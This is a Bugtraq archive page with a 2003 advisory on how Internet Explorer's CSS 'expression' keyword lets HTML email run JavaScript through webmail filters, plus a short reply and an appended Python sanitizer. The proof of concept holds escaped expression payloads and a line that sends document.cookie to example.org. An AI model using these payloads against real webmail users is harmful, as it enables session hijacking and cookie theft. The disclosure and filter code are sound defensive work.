Bugtraq mailing list archives

RE: Webmails + Internet Explorer can create unwanted javascript execution


From: "Drew Copley" <dcopley () eeye com>
Date: Fri, 3 Oct 2003 10:19:23 -0700

Yahoo has a massive userbase (with good reason).

This kind of bug could potentially turn some IE security issues into a more
readily mail borne attack. This could be bad. Very bad.

I do not see that you have contacted Yahoo on this. 



-----Original Message-----
From: Jedi/Sector One [mailto:j () pureftpd org] 
Sent: Thursday, October 02, 2003 2:39 PM
To: bugtraq () securityfocus com
Subject: Webmails + Internet Explorer can create unwanted 
javascript execution
Summary : Multiple web-based mail systems browsed through Internet Explorer
          can allow arbitrary javascript execution.
Date    : 02/10/2003
Author  : Frank Denis <j () pureftpd org>


       ------------------------[ Description ]------------------------
       
  The issue described here doesn't reveal a vulnerability in 
a specific product. But the combination of features of 
Internet Explorer with features of common webmail software 
can create a vulnerability.

1) Internet Explorer interprets stylesheets for any HTML tag, 
even non-existent ones. For instance :

<xbody style="...">

  is not a valid tag, but attributes are evaluated.
  
  It may be considered as a bug or as a logical behavior, 
your mileage may vary. And this alone is not a security flaw.

2) Internet Explorer can evaluate Javascript expressions in 
style sheets through the "expression" keyword :

<style type="text/css">
a {
  width: expression(6 * 9 + 'px');  
}
</style>

  This is not a bug either, but a proprietary, properly 
documented extension.

3) Due to the increase of HTML-only email, most popular 
webmail software can display HTML email. In this context, 
Javascript _must_ be removed from every email. To achieve 
this result, various tricks are used by webmail software :

 - Removal or mangling of <script> tags,

 - Removal or mangling of "javascript:" urls,

 - Removal or mangling of properties like "onmouseover".
 

      ------------------------[ Vulnerability ]------------------------

  By combining 2) with 3) and if the webmail doesn't filter 
out stylesheets nor the "expression" keyword, any Javascript 
contained in a message will be executed as soon as the 
recipient will display it.

  Some webmail software has been aware of that issue for a while
and mangles or filters any occurrence of "expression". However,
the mangling may not work when the name of the property is
escaped (like "e\xpression") as CSS permits. Or it may not work
in the context of non-existent-because-mangled tags. The former
worked on Yahoo! until yesterday (the issue was fixed quickly
after being reported, they are nice and reactive guys).

  But most software simply doesn't know about "expression".
It is _not_ faulty, though. This is neither a bug nor a
vulnerability. "expression" is a proprietary extension.
Webmails don't have to know about every possible implication
of every proprietary extension of every version of every
browser out there.

  However, when the following conditions are met, the 
Javascript is executed :
  
- "expression" keywords aren't filtered/mangled by the 
webmail software.

- The client software is Internet Explorer.

- Javascript isn't disabled in the client software. 
Unfortunately, a lot of public webmail systems simply don't 
work when Javascript is disabled.
 

       ------------------------[ Impact ]------------------------

  Depending on the webmail software, complete control of the 
client's session may be possible. Private mail can be deleted 
or bounced to evil addresses, cookies and session identifiers 
can be stolen, etc.


    ------------------------[ Proof of concept ]------------------------
               
  Webmail software likes to filter or mangle stylesheets. Some
software totally removes everything inside <head>...</head>
tags. Some software totally removes <body>...</body> tags
(possibly killing style info by the way) instead of
converting them to something like <div>...</div>. Some
software totally removes <style>...</style> definitions but
accepts inline CSS.
  This is bad, because it encourages people to send broken
HTML 3 code instead of well-formed, accessible XHTML documents.
  The following HTML email tries to add workarounds for this
kind of filter in order to test whether the "expression"
keyword properly gets evaluated on Internet Explorer. It
currently works at least with IE 6 + Squirrelmail, Yahoo! and
the software of a dozen public and ISP webmail services I
have an account on.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
               "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
<head>
  <title>Webmail test</title>
  <meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1" />
</head>
<body style="width:&#x65;xpres\sion(alert(1))">
  <style type="text/css">
h1 {
  he\ight:&#x65;\xpression(alert(2));
  bac\kground-image:&#x65;\xpression('url(http://example.org/'+document.cookie+$
}
  </style>
  <h1 style="width:&#x65;xpression(alert(3))">...</h1>
  <div id="just-for-fun">
    <a href="&#x6A;avascript:window.open(document.location);"
       onmouseover="alert(4)">fireworks</a>
  </div>
</body>
</html>


         ------------------------[ Fix ]------------------------

  For the end user, there are four ways to avoid this issue :

 - Don't use Internet Explorer to connect to webmails,
 or/and
 - Disable Javascript,
 or/and
 - Configure the webmail to only display mails as plain text,
 or/and
 - Only connect to webmails when you are 100% sure the software it is
   powered by completely filters or mangles "expression" keywords and
   hope that software and the version won't change silently.


--
 __  /*-      Frank DENIS (Jedi/Sector One) <j () 42-Networks Com>     -*\  __
 \ '/    <a href="http://www.PureFTPd.Org/"> Secure FTP Server </a>    \' /
  \/  <a href="http://www.Jedi.Claranet.Fr/"> Misc. free software </a>  \/
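Added example, not part of the advisory above and not code from Squirrelmail, Yahoo! or any other webmail it mentions: a small Python filter showing the normalize-then-match approach the advisory implies. A keyword filter that looks for the literal string "expression" misses what IE actually interprets, so this decodes HTML entities (&#x65;), CSS backslash escapes (e\xpression, \65 xpression) and CSS comments first, and only then refuses declarations containing expression( or javascript:. The sample declarations and the SAMPLE_SHEET constant are constructed from the proof of concept (the truncated cookie-leaking expression is completed with a closing quote); all function names are mine.

```python
import html
import re

# CSS backslash escapes: "\65" (1-6 hex digits plus one optional trailing
# whitespace character) decodes to "e"; a backslash before a non-hex
# character just yields that character. That is why "e\xpression" and
# "he\ight" are read by IE as "expression" and "height" while a naive
# keyword filter never sees the word.
_CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\r\n\f]?|\\(.)", re.DOTALL)
_CSS_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
# What is refused after normalisation: IE's expression() and script URLs.
_DANGEROUS = re.compile(r"expression\s*\(|javascript\s*:")


def _decode_css_escape(match):
    hex_digits, literal = match.group(1), match.group(2)
    if hex_digits is None:
        return literal
    try:
        return chr(int(hex_digits, 16))
    except ValueError:  # code point above U+10FFFF: drop it
        return ""


def normalize_css(text):
    """Reduce a CSS fragment to roughly what IE would interpret: HTML
    entities decoded (a style attribute is entity-decoded by the HTML
    parser before the CSS engine sees it), comments dropped, backslash
    escapes decoded, NULs removed, everything lower-cased. Matching
    after this step is what defeats the escaping tricks."""
    text = html.unescape(text)
    text = _CSS_COMMENT.sub("", text)
    text = _CSS_ESCAPE.sub(_decode_css_escape, text)
    text = text.replace("\x00", "")
    return text.lower()


def is_dangerous_css(fragment):
    """True if the normalised fragment contains expression() or a script URL."""
    return _DANGEROUS.search(normalize_css(fragment)) is not None


def _keep_safe_declarations(normalized_declarations):
    # Split an already-normalised declaration list and drop every
    # declaration that matches. (Splitting on ";" before decoding would
    # break on entities such as "&#x65;", which themselves contain ";".)
    kept = []
    for declaration in normalized_declarations.split(";"):
        declaration = declaration.strip()
        if declaration and _DANGEROUS.search(declaration) is None:
            kept.append(declaration)
    return "; ".join(kept)


def sanitize_declarations(style_attribute):
    """Sanitise the contents of a style="..." attribute. The value is
    normalised exactly once, then filtered; the returned value is the
    decoded form, so no escape sequence survives into the output."""
    return _keep_safe_declarations(normalize_css(style_attribute))


def sanitize_stylesheet(sheet):
    """Sanitise a <style> block: normalise once, then filter the
    declaration list inside every { ... } rule body."""
    normalized = normalize_css(sheet)
    return re.sub(r"\{(.*?)\}",
                  lambda m: "{" + _keep_safe_declarations(m.group(1)) + "}",
                  normalized, flags=re.DOTALL)


# Constructed from the advisory's proof of concept; example.org is the
# placeholder the advisory itself uses, no real endpoint is contacted.
SAMPLE_SHEET = (
    "h1 {\n"
    "  he\\ight:&#x65;\\xpression(alert(2));\n"
    "  bac\\kground-image:&#x65;\\xpression('url(http://example.org/'"
    "+document.cookie+')');\n"
    "}"
)

if __name__ == "__main__":
    for sample in ("width:&#x65;xpression(alert(1))",
                   "he\\ight:&#x65;\\xpression(alert(2))",
                   "width: \\65 xpression(alert(3))",
                   "width: 100px; color: #fff"):
        print(f"{sample!r:42} -> {normalize_css(sample)!r}"
              f"  dangerous={is_dangerous_css(sample)}")
    print(sanitize_declarations(
        "color: red; width:&#x65;xpression(alert(1)); font-size: 12px"))
    print(sanitize_stylesheet(SAMPLE_SHEET))
```

The point of the design is that matching happens on the decoded text and the decoded text is what gets emitted, so a filter cannot be talked into passing one spelling of the keyword while the browser sees another. A production filter would rather allowlist a small set of properties and value grammars than extend the deny pattern, and would need a real CSS tokenizer to handle ";" inside quoted strings, which this naive split does not.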


